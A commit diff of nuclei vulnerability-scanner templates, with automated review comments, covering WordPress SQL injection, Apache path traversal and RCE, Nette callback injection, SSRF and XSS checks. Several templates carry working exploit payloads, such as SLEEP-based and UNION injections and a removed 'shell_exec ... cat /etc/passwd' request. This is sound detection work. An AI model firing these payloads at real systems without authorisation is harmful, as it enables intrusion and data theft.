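Review bot: The matchers confirm the result only through English body text (`HTTP Error 416`, `The requested range is not satisfiable`) and a `Microsoft` header, never through the status code, even though the referenced analysis distinguishes patched from unpatched hosts by how the server answers the oversized `Range`; adding `- type: status` with `status: [416]` under the existing `matchers-condition: and` would keep the check working against localized or customised error pages. The `Range` value itself deserves a comment recording that it is the non-destructive form of the probe described in the references, e.g. `# non-destructive MS15-034 probe per the references; keep the bounds as they are`, so a later edit does not change it casually. The `cpe` and `metadata.product` pin `windows_7` while the description lists Server 2008 R2, 8, 8.1 and 2012; that is usual for a single-CPE field but worth a note since the template fires on any IIS host.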


@ -2,7 +2,7 @@ id: CVE-2015-2794
info:
name: DotNetNuke 07.04.00 - Administration Authentication Bypass
author: 1337kro
author: 0xr2r
severity: critical
description: |
The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
@ -45,4 +45,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a004730450221008832d97a34293638b4c086c5a28aff802fdb47075161daec024897821ed9922b02202ce97274853804157a6224c3711bc0fb0fa9f58c60aef8297fc5f8747126c182:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205b931368f972e054b081418fdcdbd6d16c6c7a1ef76a663c0d9db9d8c3fc353f02207c5737d6057af1e35c3ca3e3687a60ef1bf3ba7e59e7d90e9a39bd6fabc3213a:922c64590222798bb761d5b6d8e72950


@ -27,19 +27,23 @@ info:
product: subrion_cms
tags: cve2017,cve,sqli,subrion,intelliants
variables:
string: "{{to_lower(rand_base(5))}}"
hex_string: "{{hex_encode(string)}}"
http:
- method: GET
path:
- "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"
- "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "projectdiscovery.io"
- '{{string}}'
- type: status
status:
- 200
# digest: 4a0a004730450221008122f5a7f1c537936474771ca8cbc773e4fd522783e15948324010c182882d44022034bde42890c4acf5f2806b5e320405129f41263dcbf69b64ef49635cf58d8e0d:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022054097ca889716ee0d3ffd26eccb31e1090cc41ee675729b96e5ec67138f7634c022043939c20b2460e4071b9a01a8d590cef58a83e2c49c0f73b1f517d3434666c0f:922c64590222798bb761d5b6d8e72950
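Review bot: The success marker is now a 5-character value from `rand_base(5)`, lowered and hex-encoded into the injected `unhex()` call, with the body matched for the raw `{{string}}`; five lowercase alphanumerics is a small space, and a page that echoes the search input or simply contains a lot of text has a non-negligible chance of containing any given 5-character string by coincidence. Raising the length, for example `rand_base(10)`, keeps the random-canary approach while making an accidental substring match vanishingly unlikely. A short comment on the `variables` block explaining that the canary replaces the fixed `projectdiscovery.io` marker (presumably to avoid cached or replayed false positives) would help the next reader. The `info` block starts outside the hunk.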


@ -28,7 +28,7 @@ info:
max-request: 65
vendor: embedthis
product: goahead
tags: cve,cve2017,rce,goahead,brute-force,kev,vulhub,embedthis
tags: cve,cve2017,rce,goahead,bruteforce,kev,vulhub,embedthis
http:
- raw:
@ -117,4 +117,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022047ce66d8caa4a42f359d87b562ccfd3702d82b3e5306d17049fc7572d66bc16c022100bf004dc58ed2839f05b495f4434442d941c1de5236150a6fd3606381073f7ed5:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100dec8b43170cf34ed98fbf83c8dc09389ffefda9fd823a123f509f32dbb63cc570220638e59f0bec3b3ab5a49d51408722e58ca5276e415dfaa2cb4821b2c65b295ac:922c64590222798bb761d5b6d8e72950


@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-17431
cwe-id: CWE-287
epss-score: 0.11315
epss-percentile: 0.94677
epss-score: 0.11416
epss-percentile: 0.95073
cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502206e56a0d536dfc8d4ed10ae0505f2d2548b6c986854d0813c6e8185acc66756d9022100e74e57bbb9b04d2860f174d0f9effbef03a265a0ada954ea317f3fffa89a12ca:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950


@ -15,13 +15,14 @@ info:
- https://wordpress.org/plugins/jsmol2wp/
- https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
- https://nvd.nist.gov/vuln/detail/CVE-2018-20463
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-20463
cwe-id: CWE-22
epss-score: 0.01939
epss-percentile: 0.87393
epss-percentile: 0.88289
cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -53,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502205f9aeadd874f5fdf363e87acc0ec34f995e53677d28cbc33b27cf113d9de2b03022100c5b000d74f0180cb372d2dd355622f03e7cb2b5180ac3cb0e6f0660049f49dba:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221008b0f6a4e144ec0a4f5fb0f772930b5da535472e941723be6c675589ac426a8b5022100bef4cc125a636184009e644aeb5fa64c4a868c49d7c081e63409ed228515e3ed:922c64590222798bb761d5b6d8e72950


@ -27,7 +27,7 @@ info:
max-request: 100
vendor: zabbix
product: zabbix
tags: cve2019,cve,brute-force,auth-bypass,login,edb,zabbix
tags: cve2019,cve,bruteforce,auth-bypass,login,edb,zabbix
http:
- raw:
@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a004830460221009f2eef4ff9783ccdb0da0deb516cbeef6088cf8748cea7f07e2d0db26e145471022100e1a20eb9c42ec21526ec4e60014c9c44a9cb9eebf923e1e0016faabd478bd8ce:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221009174b05ef7a525c5b373a0d82c9f2e6ef53e2f208703ddae369493fdf4e868d5022100ffcea06c1174e9a583cf539ef4f49ecda6eb0849493b197b58859a5e058e7cb4:922c64590222798bb761d5b6d8e72950


@ -27,20 +27,24 @@ info:
max-request: 1
vendor: nette
product: application
fofa-query: app="nette-Framework"
verified: true
tags: cve2020,cve,nette,rce
http:
- method: GET
path:
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
- "{{BaseURL}}/nette.micro/?callback=phpcredits"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "PHP Credits"
- type: status
status:
- 200
# digest: 4a0a00473045022100c514809246bae4d622a6f54b7f309f8d1838a8320122852f607689aa0d8591f00220583827d07fe105e21e3f2c8d355bd4a383c60d0b9fa26ec3897668a09ea6a421:922c64590222798bb761d5b6d8e72950
- type: word
part: header
words:
- "Nette Framework"
# digest: 4a0a00473045022100c7edf32bbe09d40436d30da39271cd16112ead5a0c94b155a42dce50938fb84c0220526028064e9f272d8365aafc3b6b7558d1f606bd48da3dcf7576ceee091b452e:922c64590222798bb761d5b6d8e72950
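Review bot: The swap from `shell_exec` to `phpcredits` as the callback is the right direction, since it proves the callable sink without running a command, but nothing in the template says so and a later contributor may revert to a "stronger" payload; a comment on the path entry such as `# phpcredits: harmless callable that proves the callback sink without executing commands` records the decision. The new `part: header` matcher for `Nette Framework` presumably keys on a framework banner header; if that header can be suppressed by configuration, a vulnerable host without it is now missed under `matchers-condition: and`, so either that trade-off should be documented or the header check moved to an extractor. The `info` block starts outside the hunk.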


@ -20,8 +20,8 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-24223
cwe-id: CWE-79
epss-score: 0.00976
epss-percentile: 0.81758
epss-score: 0.0069
epss-percentile: 0.79602
cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
metadata:
max-request: 1
@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100c973b82339421ec3089eac4ceee54851fb8db56c023e4110994b8c16b279307f022100ba5f5c61a9f8acb6755ba89ca34bb684ee60ac4e1e7c96f40f0688789b22e49a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502203465eb756d9c1c2a642192e678566a419006885438b5721b7a8b54470650a994022100a3b09f8d55baad75a18b6eb7fab36fd7cf976201304457c717358dd7b6fa2862:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
vendor: redhat
product: keycloak
shodan-query: "title:\"keycloak\""
tags: cve,cve2020,keyclock,exposure
tags: cve,cve2020,keycloak,exposure
http:
- method: GET
@ -52,4 +52,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100a6e9bf7a3b64c5e90d619114c77ef26e4910bb56c4488208e2381e574562d66e022100944c1456d486efb48fc5d8d143759d157d22b7b23d81cffcf4cbd94219ae8cd0:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e340099dadc3710a63b8cc3e0182b0c1a738f7480c069fa5c39913092f31b39802201ad2dbae637d451dd3a442b8c8a7d2f0d5244240545b98ba4431a62241c66fa6:922c64590222798bb761d5b6d8e72950


@ -14,13 +14,15 @@ info:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
- https://nvd.nist.gov/vuln/detail/CVE-2021-21805
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-21805
cwe-id: CWE-78
epss-score: 0.97374
epss-percentile: 0.99892
epss-percentile: 0.99895
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
metadata:
verified: true
@ -52,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100f2a3e97b98df27aafb1f8001f577c595d1cbb4fed075db594314502fbf283bd602204b4e9e0d429dacbd3c7672f6fd16118bbc7e73d54077c27d333a19e89ac0f5db:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950


@ -21,7 +21,7 @@ info:
cve-id: CVE-2021-22873
cwe-id: CWE-601
epss-score: 0.00922
epss-percentile: 0.81209
epss-percentile: 0.82474
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
metadata:
verified: true
@ -49,4 +49,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 490a0046304402206825e5ab8251fc139a7b9f7ac5b06687ca56ae1e65ed767ca11c20c7930c7e1f02205a2f6d3c6d66a885a07cd69568accc9951b72dc883ed9cc1f62f561083da2e0c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502201f562b389b6a5f97abaafe839123249c8bfc49d20d8cc12c06a61ee23b840795022100e4d6049c15f40c1564d2e55b52873ca91a7030a85feb7605ebf54ce291e513d5:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,49 @@
id: CVE-2021-24442
info:
name: Wordpress Polls Widget < 1.5.3 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks
remediation: Fixed in 1.5.3
reference:
- https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24442
- https://wordpress.org/plugins/polls-widget/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24442
cwe-id: CWE-89
epss-score: 0.00212
epss-percentile: 0.58237
cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wpdevart
product: poll\,_survey\,_questionnaire_and_voting_system
framework: wordpress
publicwww-query: "/wp-content/plugins/polls-widget/"
tags: wpscan,cve,cve2021,wp,wp-plugin,wpscan,wordpress,polls-widget,sqli
http:
- raw:
- |
@timeout: 25s
POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Forwarded-For: {{randstr}}
question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains_all(body, "{\"answer_name", "vote\":")'
condition: and
# digest: 4a0a00473045022077e2d0f0096519c85cc2560e8aa0947b9480af46a12b487659284f2207bd7a13022100eff5ad69413aa6014c4fc03c62f75c9e69ec2e5bfb10908470a3f44c6bcecdff:922c64590222798bb761d5b6d8e72950
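Review bot: The `tags` line repeats `wpscan` (`tags: wpscan,cve,cve2021,wp,wp-plugin,wpscan,wordpress,polls-widget,sqli`); drop the second occurrence, and the same duplicate is present in the new CVE-2021-24849 and CVE-2021-24943 templates in this commit. The only positive signal here is `duration>=5` on a single request, so a slow or overloaded target can satisfy the matcher without the injection; the status and body checks narrow it but do not remove that, and a comment stating the false-positive risk would help whoever triages the finding. The request also hard-codes `poll_answer_securety=8df73ed4ee` with no explanation; a comment such as `# poll_answer_securety is a fixed value — confirm the handler accepts any value, otherwise this check never fires` records the assumption for maintainers.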


@ -1,7 +1,7 @@
id: CVE-2021-24762
info:
name: WordPress Perfect Survey<1.5.2 - SQL Injection
name: WordPress Perfect Survey <1.5.2 - SQL Injection
author: cckuailong
severity: critical
description: |
@ -13,8 +13,8 @@ info:
reference:
- https://www.exploit-db.com/exploits/50766
- https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
- https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -28,13 +28,13 @@ info:
vendor: getperfectsurvey
product: perfect_survey
framework: wordpress
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,unauth,edb,getperfectsurvey
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey
http:
- raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1
GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
@ -51,4 +51,4 @@ http:
- type: status
status:
- 404
# digest: 4b0a00483046022100dc31a17605a60d5af3be547b7336024caf4ab4335ca417a63422a3bcc4bbb8b6022100b2d7e5fce40df099911318ad66b154d1f69a76338f56107dc6284b6c231579ad:922c64590222798bb761d5b6d8e72950
# digest: 4b0a0048304602210088b2f8641efb17289d0c9fa1e0fc57697b83b89f2c710a54603d6e0536009441022100c2ca459924277032aeae17d881fd19c80a6e3501bb3ff5be948390480bec353d:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,70 @@
id: CVE-2021-24849
info:
name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
reference:
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
- https://wordpress.org/plugins/wc-multivendor-marketplace/
remediation: Fixed in 3.4.12
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24849
cwe-id: CWE-89
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
epss-score: 0.00199
epss-percentile: 0.56492
metadata:
product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
framework: wordpress
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
verified: true
max-request: 3
vendor: wclovers
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{post_data}}
payloads:
post_data:
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains(body, "success")'
condition: and
# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950
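Review bot: The `metadata` block quotes `product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"` but leaves `vendor: wclovers` plain and lists `product` before `vendor`, while the other new templates in this commit (CVE-2021-24442, CVE-2021-24943) use unquoted values in the order verified, max-request, vendor, product, framework; one order and one quoting style across the set makes these files diff cleanly. The `flow` gate on `readme.txt` only confirms the plugin is installed, not its version, so a positive still rests on a single `duration>=5` observation in the second request; a comment noting that a hit should be re-checked against the installed version before it is treated as confirmed would help triage.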


@ -0,0 +1,51 @@
id: CVE-2021-24943
info:
name: Registrations for the Events Calendar < 2.7.6 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.
remediation: Fixed in 2.7.6
reference:
- https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24943
- https://wordpress.org/plugins/registrations-for-the-events-calendar/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24943
cwe-id: CWE-89
epss-score: 0.00199
epss-percentile: 0.56492
cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: roundupwp
product: registrations_for_the_events_calendar
framework: wordpress
publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
tags: wpscan,cve,cve2021,wp,wp-plugin,wpscan,wordpress,sqli,registrations-for-the-events-calendar
variables:
text: "{{rand_base(5)}}"
http:
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(body, "Please enter the email you registered with")'
condition: and
# digest: 490a0046304402205fdda9c8d4779e2557fe7c639bac3b8efca15af2034265114daf03628ab5e8f90220450c244cc25345ee7065bcecb32ae6c7b1e33cc7bd263a94334969d729692ca7:922c64590222798bb761d5b6d8e72950
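Review bot: `epss-score: 0.00199` and `epss-percentile: 0.56492` are byte-identical to the values in the new CVE-2021-24849 template in this commit, which looks more like a copy-paste than two independent lookups; worth re-checking both against the EPSS feed. The `variables` block builds `text` with `rand_base(5)` for the e-mail address but does not say why it is not a fixed string; if the intent is to avoid collisions with an address stored by a previous run, a comment such as `# random local-part/domain so repeated scans do not reuse a stored address` would make that explicit (assumption; the template does not state it).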


@ -18,13 +18,14 @@ info:
cve-id: CVE-2021-27748
metadata:
verified: true
max-request: 2
max-request: 3
shodan-query: http.html:"IBM WebSphere Portal"
tags: cve2021,cve,hcl,ibm,ssrf,websphere
http:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
@ -35,10 +36,13 @@ http:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Interactsh Server"
- type: status
status:
- 200
# digest: 4b0a00483046022100b6134f89233da535e75fb3d2abac8b55797ec0997bc234ba4559b250efcc3489022100c2cce298030c3efdccc4e809925e7d77d72aab31f1de74f9c86ab5ae022b0a1e:922c64590222798bb761d5b6d8e72950
- type: word
part: body_1
words:
- "Interactsh Server"
negative: true
# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950
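Review bot: The added negative matcher uses `part: body_1`, which nuclei only evaluates when the request block sets `req-condition: true`; that setting is not visible here (the request block's lines between the two hunks are not shown), and without it the guard against a root page that already contains "Interactsh Server" silently does nothing. If it is absent, add `req-condition: true` alongside `method: GET`. The positive `part: body` word matcher is evaluated per request, so it also matches the plain `{{BaseURL}}` response, which is presumably what the `body_1` check is meant to cancel out; a one-line comment on the negative matcher stating that purpose would make the pairing clear.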


@ -18,8 +18,8 @@ info:
cwe-id: CWE-22
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
metadata:
max-request: 1
shodan-query: title:"openSIS"
shodan-query: "title:\"openSIS\""
max-request: 2
tags: cve,cve2021,lfi,os4ed,opensis,authenticated
http:
@ -42,4 +42,4 @@ http:
- 'contains(body_1, "openSIS")'
- "status_code == 200"
condition: and
# digest: 490a004630440220206394b303ab92ce65590e2c61e6eb5e9914219a5a0651ae69009a3f224109ff02207e729d1c062d3bd2e445a39a036992cc281564407a764e7f7ced5f02879f1034:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100924b4c785059886c8131bde539e1106c1be30952a7fea88bd992cb9cc3e7aca202204c4c3c880b323df6c23378c766e00dd0222716aa49f384cbc8f4c37b7c9ab38f:922c64590222798bb761d5b6d8e72950


@ -1,4 +1,4 @@
id: "CVE-2021-42013"
id: CVE-2021-42013
info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
@ -30,7 +30,7 @@ info:
product: http_server
tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev
variables:
cmd: "echo COP-37714-1202-EVC | rev"
cmd: "echo 31024-1202-EVC | rev"
http:
- raw:
@ -66,4 +66,4 @@ http:
name: LFI
regex:
- "root:.*:0:0:"
# digest: 4a0a0047304502210090df2d0b0784bca0957316b00eda4a86eff7538dafa59481ce77ae33976454a0022052bca4f8bcc25e748dd8ed529bba9efc648ebfa54c19b8177f9c0c4fc2da6858:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207470f1e0707171ed23b51282f56448b47cde756e37792253a19e6abc7c6a2b2b02203d6616b33eca925f272433a727bd685d8173454004fe09a7a6cdedc6daffb2a6:922c64590222798bb761d5b6d8e72950


@ -10,7 +10,7 @@ info:
- https://github.com/chillzhuang/blade-tool
metadata:
max-request: 3
tags: cve,cve2023,springblade,blade,info-leak
tags: cve,cve2021,springblade,blade,info-leak
http:
- raw:
@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
# digest: 490a004630440220304c9e6f27e05f7a603b614d229e59b893ef58d1528c62bd920706d9791db8d60220587079c49206fcc78d95924e9f27e54f38142ba541eb9ab46393425965a88263:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100b8965db2f12da5b92605ff6a2c1e8b8968f42d7d31259e428c54abd9c342066e02210098f2e2b339dcd515081900537d59c694775232efa61957cfe2944fc5c159c9db:922c64590222798bb761d5b6d8e72950


@ -21,7 +21,7 @@ info:
cve-id: CVE-2022-0776
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40832
epss-percentile: 0.40075
cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:*
metadata:
vendor: revealjs
@ -48,4 +48,4 @@ headless:
part: extract
words:
- "true"
# digest: 4a0a00473045022015776ab1f8ee5f7cbd078059bc34167a0b8ca0a11a1bda34723f7ec03d31b6c302210098d1c6a54ecbafb3158390aea2498590fe70df9d78d3266d388274859a641533:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100822f5151d594a59ff99bde533919eb403ddd05ab8d041ea5963a1c88f81d84320221008c8e17c078665f80ff1f6815e2f071996a8d9e4712b43e3bf775f0c2db3e0e12:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
vendor: automattic
product: sensei_lms
framework: wordpress
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,brute-force,hackerone,wordpress,wp-plugin,automattic
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,bruteforce,hackerone,wordpress,wp-plugin,automattic
http:
- method: GET
@ -56,4 +56,4 @@ http:
- type: status
status:
- 200
# digest: 490a0046304402201f56469497c402e5060dd148bc20614451e7dca2ff2a02ed0137deb3c983730102203aef693927819b4ac18f1f31b55f4799f6de8c2477e411a36515df9dba050dc5:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207c51a21553085f96246b9b7a7b8fcb17455c8ede92140fc56ac74b94c60b3fcf022054295c2dbda0cd3975caa9c8ac89cd1d99b8f237e8fe3258e096d29e53f99f61:922c64590222798bb761d5b6d8e72950


@ -22,7 +22,7 @@ info:
cve-id: CVE-2022-26263
cwe-id: CWE-79
epss-score: 0.00147
epss-percentile: 0.50638
epss-percentile: 0.49633
cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:*
metadata:
verified: true
@ -43,4 +43,4 @@ headless:
- '<frame src="javascript:console.log(document.domain)"'
- 'webhelp4.js'
condition: and
# digest: 4a0a00473045022100a72f95b8648b73eb2e4cf2ea58e09902bdd87b68ed16d6258763f77029657162022064b391ae3ee631c189007bc15526ede89c3be32159ec215d129a1840544b297e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c124eb614790888649b3ad794123f8a4d5127efb6b3dfcccc25a1431ae2dd660022100bdd24ef15743a8543fc37ed7a7e4a0399762873c6016d5cd6a811baa514a747d:922c64590222798bb761d5b6d8e72950


@ -22,7 +22,7 @@ info:
cve-id: CVE-2022-30776
cwe-id: CWE-79
epss-score: 0.00112
epss-percentile: 0.44504
epss-percentile: 0.43631
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
metadata:
verified: true
@ -52,4 +52,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203171cb9a5a9125732f06bba74b71efc2e09ae7c92ad33bcca6e6356b5d541fe702210081422e4791a4a926b08807deffab9bf4cb8eab98c0f9897922d586b01218bf06:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950


@ -37,7 +37,7 @@ variables:
http:
- method: GET
path:
- '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`'
- '{{BaseURL}}/?doAs=`{{url_encode("{{command}}")}}`'
matchers-condition: and
matchers:
@ -45,4 +45,4 @@ http:
part: body
words:
- "19833-2202-EVC"
